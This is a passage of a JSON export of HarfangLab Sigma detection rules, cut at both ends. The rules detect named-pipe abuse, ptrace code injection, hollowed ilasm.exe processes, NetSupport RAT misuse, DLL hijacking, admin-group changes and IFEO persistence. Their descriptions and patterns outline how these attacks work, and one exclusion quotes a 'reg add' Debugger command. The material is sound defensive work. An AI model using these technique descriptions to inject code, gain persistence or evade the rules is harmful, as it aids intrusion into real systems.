https://github.com/itm4n/PrintSpoofer\n - '\\\\????????-????-????-????-????????????\\pipe\\spoolss'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a8b9aac2-c03f-4a42-b223-9380cae3dc1e",
"rule_name": "Suspicious Named Pipe Connected",
"rule_description": "Detects the opening of a suspicious named pipe used by attackers.\nThis named pipe has been used by attackers in real situations and it is related with malicious code.\nIt is recommended to investigate the process that connected to the named pipe to determine its legitimacy.\n",
"rule_creation_date": "2022-07-26",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a90eab98-24ff-483a-b9ce-12145ac7789b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625834Z",
"creation_date": "2026-03-23T11:45:34.625836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625840Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.akamai.com/blog/security-research/the-definitive-guide-to-linux-process-injection",
"https://cocomelonc.github.io/linux/2024/11/22/linux-hacking-3.html",
"https://attack.mitre.org/techniques/T1055/008/"
],
"name": "t1055_008_ptrace_remote_code_injection.yml",
"content": "title: Ptrace Remote Code Injection\nid: a90eab98-24ff-483a-b9ce-12145ac7789b\ndescription: |\n Detects a ptrace system call with suspicious parameters.\n Adversaries may inject malicious code into processes using ptrace (process trace) system calls to evade process-based defenses and potentially elevate privileges.\n Ptrace system call injection is a method for executing arbitrary code within the address space of a separate, running process. This technique can be implemented using:\n - PTRACE_POKETEXT/PTRACE_POKEDATA: These operations copy data to specific memory addresses in the target process.\n - PTRACE_SETREGS: This sets control registers to point to the injected payload.\n It is recommended to investigate both the source and destination processes for suspicious behavior.\nreferences:\n - https://www.akamai.com/blog/security-research/the-definitive-guide-to-linux-process-injection\n - https://cocomelonc.github.io/linux/2024/11/22/linux-hacking-3.html\n - https://attack.mitre.org/techniques/T1055/008/\ndate: 2025/07/15\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055.008\n - classification.Linux.Source.ProcessPtrace\n - classification.Linux.Behavior.ProcessInjection\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n product: linux\n category: process_ptrace\ndetection:\n selection:\n AgentVersion|gte|version: 4.12.0\n ProcessImage|contains: '?'\n PtraceRequestStr:\n - 'PTRACE_POKETEXT' # Copy data to the remote process\n - 'PTRACE_POKEDATA' # Copy data to the remote process\n - 'PTRACE_SETREGS' # Modify the context of the remote process\n TargetIsChild: false\n\n exclusion_wine:\n ProcessImage|endswith:\n - '/bin/wineserver'\n - '/usr/lib/wine/wineserver64'\n\n exclusion_debugging_tools:\n ProcessImage|endswith:\n - '/bin/gdb'\n - '/libexec/gdb'\n - '/bin/gdbserver'\n - '/bin/ltrace'\n - '/bin/dlv'\n - '/dlv/linux/dlv'\n - '/go/dlv'\n - '/intel64/pinbin'\n - '/bin64/pinbin'\n - '/bin/lldb-server'\n\n exclusion_dynatrace:\n ProcessImage:\n - '/opt/dynatrace/*/oneagenthelper'\n - '/opt/dynatrace-agent/*/oneagenthelper'\n\n exclusion_reptyr:\n ProcessImage: '/usr/bin/reptyr'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a90eab98-24ff-483a-b9ce-12145ac7789b",
"rule_name": "Ptrace Remote Code Injection",
"rule_description": "Detects a ptrace system call with suspicious parameters.\nAdversaries may inject malicious code into processes using ptrace (process trace) system calls to evade process-based defenses and potentially elevate privileges.\nPtrace system call injection is a method for executing arbitrary code within the address space of a separate, running process. This technique can be implemented using:\n- PTRACE_POKETEXT/PTRACE_POKEDATA: These operations copy data to specific memory addresses in the target process.\n- PTRACE_SETREGS: This sets control registers to point to the injected payload.\nIt is recommended to investigate both the source and destination processes for suspicious behavior.\n",
"rule_creation_date": "2025-07-15",
"rule_modified_date": "2025-12-19",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a91853a8-d863-424a-8965-3bd13bd30147",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069633Z",
"creation_date": "2026-03-23T11:45:34.069636Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069644Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_ilasm.yml",
"content": "title: Ilasm.exe Sacrificial Process Spawned\nid: a91853a8-d863-424a-8965-3bd13bd30147\ndescription: |\n Detects the suspicious execution of the legitimate ilasm.exe Windows binary, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n The Vidar malware is known to use this technique.\n It is recommended to investigate the parent process performing this action and the destination IP address of the ilasm.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\ilasm.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a91853a8-d863-424a-8965-3bd13bd30147",
"rule_name": "Ilasm.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate ilasm.exe Windows binary, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThe Vidar malware is known to use this technique.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the ilasm.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a952e760-ea38-44a8-986c-df40805bbac4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082914Z",
"creation_date": "2026-03-23T11:45:34.082916Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082920Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://perception-point.io/blog/operation-phantomblu-new-and-evasive-method-delivers-netsupport-rat/",
"https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_abnormal_netsupport_execution.yml",
"content": "title: Abnormal NetSupport Execution\nid: a952e760-ea38-44a8-986c-df40805bbac4\ndescription: |\n Detects the execution of NetSupport from an unusual location.\n NetSupport is a Remote Access Tool (RAT) which can be used by attackers to establish an interactive command and control channel to target systems within protected networks.\n It is recommended to verify if the usage of this tool is legitimate.\nreferences:\n - https://perception-point.io/blog/operation-phantomblu-new-and-evasive-method-delivers-netsupport-rat/\n - https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2024/03/25\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.NetSupport\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - ProcessOriginalFileName: 'client32.exe'\n - ProcessProduct: 'NetSupport Remote Control'\n\n filter_legitimate_path:\n Image:\n - '?:\\Program Files\\\\*'\n - '?:\\Program Files (x86)\\\\*'\n # https://help.netsupportschool.com/en-windows/Content/Windows/Deploy/deploy_getting_started.html\n - '?:\\Windows\\pcirdist.tmp\\PCIRISVR.EXE'\n\n filter_installer:\n ProcessDescription: 'NetSupport Installer Helper'\n ProcessParentImage|endswith: '\\msiexec.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a952e760-ea38-44a8-986c-df40805bbac4",
"rule_name": "Abnormal NetSupport Execution",
"rule_description": "Detects the execution of NetSupport from an unusual location.\nNetSupport is a Remote Access Tool (RAT) which can be used by attackers to establish an interactive command and control channel to target systems within protected networks.\nIt is recommended to verify if the usage of this tool is legitimate.\n",
"rule_creation_date": "2024-03-25",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a9b65e67-ae73-4a0a-93a8-e87d4e15f3a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592987Z",
"creation_date": "2026-03-23T11:45:34.592990Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592998Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_sdbinst.yml",
"content": "title: DLL Hijacking via sdbinst.exe\nid: a9b65e67-ae73-4a0a-93a8-e87d4e15f3a2\ndescription: |\n Detects potential Windows DLL Hijacking via sdbinst.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sdbinst.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\apphelp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a9b65e67-ae73-4a0a-93a8-e87d4e15f3a2",
"rule_name": "DLL Hijacking via sdbinst.exe",
"rule_description": "Detects potential Windows DLL Hijacking via sdbinst.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "a9e0a63b-2a2b-41d1-839b-cb482e15edcb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072558Z",
"creation_date": "2026-03-23T11:45:34.072561Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072565Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1098/",
"https://attack.mitre.org/techniques/T1078/003/"
],
"name": "t1098_add_user_to_local_administrators_group.yml",
"content": "title: User Account Added to the Local Administrators Group\nid: a9e0a63b-2a2b-41d1-839b-cb482e15edcb\ndescription: |\n Detects when a user account is added into the local Administrators group.\n Attackers can add a new user to the Administrators group to establish persistence on infected hosts.\n It is recommended to investigate the context of the detection and any suspicious authentications with the user newly added to the group to determine if this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1098/\n - https://attack.mitre.org/techniques/T1078/003/\ndate: 2021/04/28\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1098\n - attack.privilege_escalation\n - attack.t1078.003\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4732\n GroupSid: 'S-1-5-32-544'\n\n exclusion_joined:\n - MemberSid: 'S-1-5-21-*-512' # avoid detection when a computer joined a domain (domain admins sid)\n - SubjectUserName|endswith: '$'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "a9e0a63b-2a2b-41d1-839b-cb482e15edcb",
"rule_name": "User Account Added to the Local Administrators Group",
"rule_description": "Detects when a user account is added into the local Administrators group.\nAttackers can add a new user to the Administrators group to establish persistence on infected hosts.\nIt is recommended to investigate the context of the detection and any suspicious authentications with the user newly added to the group to determine if this action was legitimate.\n",
"rule_creation_date": "2021-04-28",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.003",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aa235c35-c389-4966-93a2-da5f443718e3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593712Z",
"creation_date": "2026-03-23T11:45:34.593716Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593723Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_licensediag.yml",
"content": "title: DLL Hijacking via licensediag.exe\nid: aa235c35-c389-4966-93a2-da5f443718e3\ndescription: |\n Detects potential Windows DLL Hijacking via licensediag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'licensediag.exe'\n ImageLoaded|endswith: '\\winbrand.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aa235c35-c389-4966-93a2-da5f443718e3",
"rule_name": "DLL Hijacking via licensediag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via licensediag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aa59cb20-2517-4d55-8264-d52dc9608856",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620617Z",
"creation_date": "2026-03-23T11:45:34.620619Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620624Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
"https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/",
"https://attack.mitre.org/techniques/T1546/012/"
],
"name": "t1546_012_persistence_registry_ifeo.yml",
"content": "title: Image File Execution Option Persistence Added\nid: aa59cb20-2517-4d55-8264-d52dc9608856\ndescription: |\n Detects Image File Execution Option persistence settings in registry. This is oftenly used by threat actors to gain persistence on a machine.\n Attackers may use IFEO as persistence or as a backdoor if it is installed on system binaries that are triggered for specific actions.\n It is recommended to analyze the process reponsible for this registry edit as well as to look for malicious actions by the same user around this alert.\nreferences:\n - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/\n - https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/\n - https://attack.mitre.org/techniques/T1546/012/\ndate: 2020/09/28\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.012\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject|contains:\n - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\'\n - 'Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\'\n - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\'\n - 'Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\'\n TargetObject|endswith:\n - Debugger\n - VerifierDlls\n - MonitorProcess\n - VerifierProviders\n\n selection_rename:\n EventType:\n - 'RenameKey'\n - 'RenameValue'\n NewName|contains:\n - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\'\n - 'Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\'\n - 'Software\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\'\n - 'Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\'\n NewName|endswith:\n - Debugger\n - VerifierDlls\n - MonitorProcess\n - VerifierProviders\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_details:\n Details:\n - '/'\n - 'Blocked'\n\n exclusion_known_verifier_providers:\n # default value on win10 (with old \" \" and new \";\" separator from our driver)\n # TargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\{ApplicationVerifierGlobalSettings}\\VerifierProviders\n Details:\n - \"vrfcore.dll vfbasics.dll vfcompat.dll vfluapriv.dll vfprint.dll vfnet.dll vfntlmless.dll vfnws.dll vfcuzz.dll\"\n - \"vrfcore.dll;vfbasics.dll;vfcompat.dll;vfluapriv.dll;vfprint.dll;vfnet.dll;vfntlmless.dll;vfnws.dll;vfcuzz.dll\"\n - \"vrfcore.dll vfbasics.dll vfluapriv.dll vfcompat.dll vfprint.dll vfntlmless.dll\"\n exclusion_process_explorer:\n TargetObject|endswith: 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\\Debugger'\n ProcessInternalName: 'Process Explorer'\n\n exclusion_psappdeploytoolkit:\n # https://github.com/PSAppDeployToolkit/PSAppDeployToolkit/blob/46c98f1caa99b1640fd890b6e76ce0409ac12724/Toolkit/AppDeployToolkit/AppDeployToolkitMain.ps1#L6123\n Image:\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n Details|contains:\n - 'wscript.exe*\\PSAppDeployToolkit\\AppDeployToolkit_BlockAppExecutionMessage.vbs'\n - 'wscript.exe*\\PSAppDeployToolkit\\BlockExecution\\AppDeployToolkit_BlockAppExecutionMessage.vbs'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\\\*\\Debugger'\n\n exclusion_choco:\n Image: '?:\\ProgramData\\chocolatey\\choco.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Chocolatey Software, Inc.'\n\n exclusion_solarwinds:\n Image: '?:\\SolarWinds\\Migration.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Solarwinds Worldwide, LLC'\n\n exclusion_windows_upgrade:\n Image:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\windowsupdatebox.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupCore.exe'\n\n # https://github.com/AveYo/MediaCreationTool.bat/blob/main/bypass11/Skip_TPM_Check_on_Dynamic_Update.cmd\n exclusion_tpm_skip_check:\n ProcessCommandLine: 'reg add HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\SetupHost.exe\\0 /f /v Debugger /d ?:\\Scripts\\get11.cmd'\n ProcessParentCommandLine|contains: 'Skip_TPM_Check_on_Dynamic_Update.cmd'\n\n exclusion_heimdal:\n Image: '?:\\ProgramData\\Heimdal Security\\Heimdal Thor 